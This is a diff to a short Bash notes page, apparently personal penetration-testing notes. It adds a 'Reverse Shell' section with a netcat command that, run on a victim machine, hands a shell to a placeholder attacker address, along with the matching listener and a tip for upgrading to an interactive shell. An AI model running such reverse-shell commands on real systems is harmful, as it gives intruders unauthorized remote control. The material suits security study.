--- a/_posts/notes/system/2022-04-25-bash.md
+++ b/_posts/notes/system/2022-04-25-bash.md
@@ -4,8 +4,20 @@ title: 'Notes | Bash'
 permalink: /notes/system/bash/
 ---
 
-# [](#header-4)After a netcat...
+# [](#header-4)Reverse Shell
+If we can execute code in the victim:
+{% highlight plain %}
+... nc -e /bin/sh <ip>:<port>
+{% endhighlight %}
+
+While in the attacker:
+{% highlight plain %}
+> nc -lvnp <port>
+{% endhighlight %}
+
+# [](#header-4)After a reverse shell...
 We can get a interactive shell with the following command:
 {% highlight plain %}
 > script /dev/null -c bash
 {% endhighlight %}
+
